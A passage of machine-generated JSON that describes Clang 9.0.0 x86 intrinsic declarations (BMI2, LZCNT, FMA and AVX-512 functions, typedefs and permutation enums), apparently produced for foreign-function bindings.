"bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_bzhi_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:21:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_pdep_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:27:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_pext_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:33:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_bzhi_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:41:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_pdep_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:47:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_pext_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:53:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mulx_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:59:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__Y", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__lzcnt32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lzcntintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_lzcnt_u32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lzcntintrin.h:63:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_lzcnt_u64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/lzcntintrin.h:96:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__X", "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:28:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:40:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:52:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:58:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:64:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:70:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fnmadd_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:82:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fnmadd_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:88:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:94:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fnmsub_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:106:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fnmsub_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:112:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:118:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:136:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_fmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_fmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:148:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_fmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_fmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_fnmadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:166:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_fnmadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:172:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_fnmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:178:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_fnmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:184:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_fmaddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:190:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_fmaddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:196:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_fmsubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:202:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_fmsubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fmaintrin.h:208:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "typedef", "ns": 0, "name": "__v64qi", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:16:14", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v32hi", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:17:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8df", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:18:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16sf", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:19:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8di", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:20:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16si", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:21:13", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v64qu", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:24:23", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v32hu", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:25:24", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v8du", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:26:28", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__v16su", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:27:22", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m512", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:29:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m512d", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:30:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m512i", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:31:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m512_u", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:33:15", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m512d_u", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:34:16", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__m512i_u", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:35:19", "type": { "tag": "<unknown-type:Vector>" } }, { "tag": "typedef", "ns": 0, "name": "__mmask8", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:37:23", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "typedef", "ns": 0, "name": "__mmask16", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:38:24", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "enum", "ns": 0, "name": "", "id": 46, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:48:9", "fields": [{ "tag": "field", "name": "_MM_CMPINT_EQ", "value": 0 }, { "tag": "field", "name": "_MM_CMPINT_LT", "value": 1 }, { "tag": "field", "name": "_MM_CMPINT_LE", "value": 2 }, { "tag": "field", "name": "_MM_CMPINT_UNUSED", "value": 3 }, { "tag": "field", "name": "_MM_CMPINT_NE", "value": 4 }, { "tag": "field", "name": "_MM_CMPINT_NLT", "value": 5 }, { "tag": "field", "name": "_MM_CMPINT_NLE", "value": 6 }] }, { "tag": "typedef", "ns": 0, "name": "_MM_CMPINT_ENUM", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:58:3", "type": { "tag": ":enum", "name": "", "id": 46 } }, { "tag": "enum", "ns": 0, "name": "", "id": 47, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:60:9", "fields": [{ "tag": "field", "name": "_MM_PERM_AAAA", "value": 0 }, { "tag": "field", "name": "_MM_PERM_AAAB", "value": 1 }, { "tag": "field", "name": "_MM_PERM_AAAC", "value": 2 }, { "tag": "field", "name": "_MM_PERM_AAAD", "value": 3 }, { "tag": "field", "name": "_MM_PERM_AABA", "value": 4 }, { "tag": "field", "name": "_MM_PERM_AABB", "value": 5 }, { "tag": "field", "name": "_MM_PERM_AABC", "value": 6 }, { "tag": "field", "name": "_MM_PERM_AABD", "value": 7 }, { "tag": "field", "name": "_MM_PERM_AACA", "value": 8 }, { "tag": "field", "name": "_MM_PERM_AACB", "value": 9 }, { "tag": "field", "name": "_MM_PERM_AACC", "value": 10 }, { "tag": "field", "name": "_MM_PERM_AACD", "value": 11 }, { "tag": "field", "name": "_MM_PERM_AADA", "value": 12 }, { "tag": "field", "name": "_MM_PERM_AADB", "value": 13 }, { "tag": "field", "name": "_MM_PERM_AADC", "value": 14 }, { "tag": "field", "name": "_MM_PERM_AADD", "value": 15 }, { "tag": "field", "name": "_MM_PERM_ABAA", "value": 16 }, { "tag": "field", "name": "_MM_PERM_ABAB", "value": 17 }, { "tag": "field", "name": "_MM_PERM_ABAC", "value": 18 }, { "tag": "field", "name": "_MM_PERM_ABAD", "value": 19 }, { "tag": "field", "name": "_MM_PERM_ABBA", "value": 20 }, { "tag": "field", "name": "_MM_PERM_ABBB", "value": 21 }, { "tag": "field", "name": "_MM_PERM_ABBC", "value": 22 }, { "tag": "field", "name": "_MM_PERM_ABBD", "value": 23 }, { "tag": "field", "name": "_MM_PERM_ABCA", "value": 24 }, { "tag": "field", "name": "_MM_PERM_ABCB", "value": 25 }, { "tag": "field", "name": "_MM_PERM_ABCC", "value": 26 }, { "tag": "field", "name": "_MM_PERM_ABCD", "value": 27 }, { "tag": "field", "name": "_MM_PERM_ABDA", "value": 28 }, { "tag": "field", "name": "_MM_PERM_ABDB", "value": 29 }, { "tag": "field", "name": "_MM_PERM_ABDC", "value": 30 }, { "tag": "field", "name": "_MM_PERM_ABDD", "value": 31 }, { "tag": "field", "name": "_MM_PERM_ACAA", "value": 32 }, { "tag": "field", "name": "_MM_PERM_ACAB", "value": 33 }, { "tag": "field", "name": "_MM_PERM_ACAC", "value": 34 }, { "tag": "field", "name": "_MM_PERM_ACAD", "value": 35 }, { "tag": "field", "name": "_MM_PERM_ACBA", "value": 36 }, { "tag": "field", "name": "_MM_PERM_ACBB", "value": 37 }, { "tag": "field", "name": "_MM_PERM_ACBC", "value": 38 }, { "tag": "field", "name": "_MM_PERM_ACBD", "value": 39 }, { "tag": "field", "name": "_MM_PERM_ACCA", "value": 40 }, { "tag": "field", "name": "_MM_PERM_ACCB", "value": 41 }, { "tag": "field", "name": "_MM_PERM_ACCC", "value": 42 }, { "tag": "field", "name": "_MM_PERM_ACCD", "value": 43 }, { "tag": "field", "name": "_MM_PERM_ACDA", "value": 44 }, { "tag": "field", "name": "_MM_PERM_ACDB", "value": 45 }, { "tag": "field", "name": "_MM_PERM_ACDC", "value": 46 }, { "tag": "field", "name": "_MM_PERM_ACDD", "value": 47 }, { "tag": "field", "name": "_MM_PERM_ADAA", "value": 48 }, { "tag": "field", "name": "_MM_PERM_ADAB", "value": 49 }, { "tag": "field", "name": "_MM_PERM_ADAC", "value": 50 }, { "tag": "field", "name": "_MM_PERM_ADAD", "value": 51 }, { "tag": "field", "name": "_MM_PERM_ADBA", "value": 52 }, { "tag": "field", "name": "_MM_PERM_ADBB", "value": 53 }, { "tag": "field", "name": "_MM_PERM_ADBC", "value": 54 }, { "tag": "field", "name": "_MM_PERM_ADBD", "value": 55 }, { "tag": "field", "name": "_MM_PERM_ADCA", "value": 56 }, { "tag": "field", "name": "_MM_PERM_ADCB", "value": 57 }, { "tag": "field", "name": "_MM_PERM_ADCC", "value": 58 }, { "tag": "field", "name": "_MM_PERM_ADCD", "value": 59 }, { "tag": "field", "name": "_MM_PERM_ADDA", "value": 60 }, { "tag": "field", "name": "_MM_PERM_ADDB", "value": 61 }, { "tag": "field", "name": "_MM_PERM_ADDC", "value": 62 }, { "tag": "field", "name": "_MM_PERM_ADDD", "value": 63 }, { "tag": "field", "name": "_MM_PERM_BAAA", "value": 64 }, { "tag": "field", "name": "_MM_PERM_BAAB", "value": 65 }, { "tag": "field", "name": "_MM_PERM_BAAC", "value": 66 }, { "tag": "field", "name": "_MM_PERM_BAAD", "value": 67 }, { "tag": "field", "name": "_MM_PERM_BABA", "value": 68 }, { "tag": "field", "name": "_MM_PERM_BABB", "value": 69 }, { "tag": "field", "name": "_MM_PERM_BABC", "value": 70 }, { "tag": "field", "name": "_MM_PERM_BABD", "value": 71 }, { "tag": "field", "name": "_MM_PERM_BACA", "value": 72 }, { "tag": "field", "name": "_MM_PERM_BACB", "value": 73 }, { "tag": "field", "name": "_MM_PERM_BACC", "value": 74 }, { "tag": "field", "name": "_MM_PERM_BACD", "value": 75 }, { "tag": "field", "name": "_MM_PERM_BADA", "value": 76 }, { "tag": "field", "name": "_MM_PERM_BADB", "value": 77 }, { "tag": "field", "name": "_MM_PERM_BADC", "value": 78 }, { "tag": "field", "name": "_MM_PERM_BADD", "value": 79 }, { "tag": "field", "name": "_MM_PERM_BBAA", "value": 80 }, { "tag": "field", "name": "_MM_PERM_BBAB", "value": 81 }, { "tag": "field", "name": "_MM_PERM_BBAC", "value": 82 }, { "tag": "field", "name": "_MM_PERM_BBAD", "value": 83 }, { "tag": "field", "name": "_MM_PERM_BBBA", "value": 84 }, { "tag": "field", "name": "_MM_PERM_BBBB", "value": 85 }, { "tag": "field", "name": "_MM_PERM_BBBC", "value": 86 }, { "tag": "field", "name": "_MM_PERM_BBBD", "value": 87 }, { "tag": "field", "name": "_MM_PERM_BBCA", "value": 88 }, { "tag": "field", "name": "_MM_PERM_BBCB", "value": 89 }, { "tag": "field", "name": "_MM_PERM_BBCC", "value": 90 }, { "tag": "field", "name": "_MM_PERM_BBCD", "value": 91 }, { "tag": "field", "name": "_MM_PERM_BBDA", "value": 92 }, { "tag": "field", "name": "_MM_PERM_BBDB", "value": 93 }, { "tag": "field", "name": "_MM_PERM_BBDC", "value": 94 }, { "tag": "field", "name": "_MM_PERM_BBDD", "value": 95 }, { "tag": "field", "name": "_MM_PERM_BCAA", "value": 96 }, { "tag": "field", "name": "_MM_PERM_BCAB", "value": 97 }, { "tag": "field", "name": "_MM_PERM_BCAC", "value": 98 }, { "tag": "field", "name": "_MM_PERM_BCAD", "value": 99 }, { "tag": "field", "name": "_MM_PERM_BCBA", "value": 100 }, { "tag": "field", "name": "_MM_PERM_BCBB", "value": 101 }, { "tag": "field", "name": "_MM_PERM_BCBC", "value": 102 }, { "tag": "field", "name": "_MM_PERM_BCBD", "value": 103 }, { "tag": "field", "name": "_MM_PERM_BCCA", "value": 104 }, { "tag": "field", "name": "_MM_PERM_BCCB", "value": 105 }, { "tag": "field", "name": "_MM_PERM_BCCC", "value": 106 }, { "tag": "field", "name": "_MM_PERM_BCCD", "value": 107 }, { "tag": "field", "name": "_MM_PERM_BCDA", "value": 108 }, { "tag": "field", "name": "_MM_PERM_BCDB", 